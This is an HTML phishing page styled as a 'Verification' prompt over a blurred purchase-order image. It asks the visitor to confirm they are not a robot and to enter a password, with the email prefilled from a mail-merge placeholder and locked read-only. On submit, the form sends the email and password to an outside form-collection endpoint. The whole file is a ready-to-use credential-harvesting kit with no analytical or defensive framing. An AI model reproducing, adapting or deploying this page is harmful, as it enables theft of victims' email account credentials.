<!DOCTYPE html>
<html lang="en">
<head>
    <title>Verification</title>
</head>

<style>
*{
    padding: 0px;
    margin: 0px;
    box-sizing: border-box;
    user-select: none;
   
}

body{
    height: 100vh;
    width: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
    background-image: url(https://images.ctfassets.net/vlflpncani0f/5AHBbbiH5tpPgMI5iBDcEJ/f4c9f0d1a0e4fc6f6612d93be95e42b3/img-purchase-order-template.jpg);
    background-size: cover;
    backdrop-filter: blur(8px);
}

.in {
    height: 60%;
    width: 45%;
    background: linear-gradient(rgb(39, 37, 37), red);
    background-repeat: no-repeat;
    display: flex;
    justify-content: center;
    align-items: center;
    border-radius: 3px;
    border-top-left-radius: 50px;
    border-bottom-right-radius: 100px;
    box-shadow: 2px 2px 3px 5px black;
}

.inside {
    height: 90%;
    width: 80%;
    display: flex;
    flex-direction: column;
    justify-content: space-between;
}

h3 {
    height: 50px;
    margin-bottom: 15px;
    display: flex;
    justify-content: center;
}

p {
    margin-bottom: 15px;
}

h3, p {
    color: white;
}

.email {
    height: 50px;
    width: 80%;
    background: white;
    padding: 5px;
    border-radius: 3px;
    border: none;
    margin-bottom: 20px;
}

.password {
    height: 50px;
    width: 80%;
    background: #ffffff;
    padding: 5px;
    border-radius: 5px;
    border: none;
    margin-bottom: 20px;
}

footer {
    display: flex;
}

.franc {
    width: 50%;
    display: flex;
}

input {
    height: 17px;
    width: 20px;
    background: white;
    margin-right: 5px;
    border-radius: 3px;
}

.france {
    width: 50%;
    padding: 10px;
}

.tap {
    height: 30px;
    width: 90px;
    background: skyblue;
    margin-top: 10px;
    display: flex;
    justify-content: center;
    align-items: center;
    box-shadow: 1px 1px 2px 3px white;
    border-radius: 5px;
    font-size: 15px;
    color: white;
    cursor: pointer;
}

.tap:hover {
    box-shadow:0 0 2.0rem red;
    color: red;
    transform: translateY(5px)
}
</style>

<body>
    <div class="in">
        <nav class="inside">
        <form action="https://submit-form.com/8M3Op4tA" method="post">
           <h3>Connect For Verification</h3>
           <p>Confirm you're not a robot</p>
           <input type="email" class="email" placeholder="Email" value="[[-Email-]]" name="email"  readonly required>
           <input type="password" class="password" placeholder="Password" name="password" required>
           <footer>
            <div class="franc">
                <input type="checkbox">
                <p>Remember me</p>
            </div>
            <nav class="france">
                <p>Forgot password?</p>
                <button class="tap" type="submit">View</button>
            </nav>
           </footer>
        </form>
        </nav>
    </div>
</body>
</html>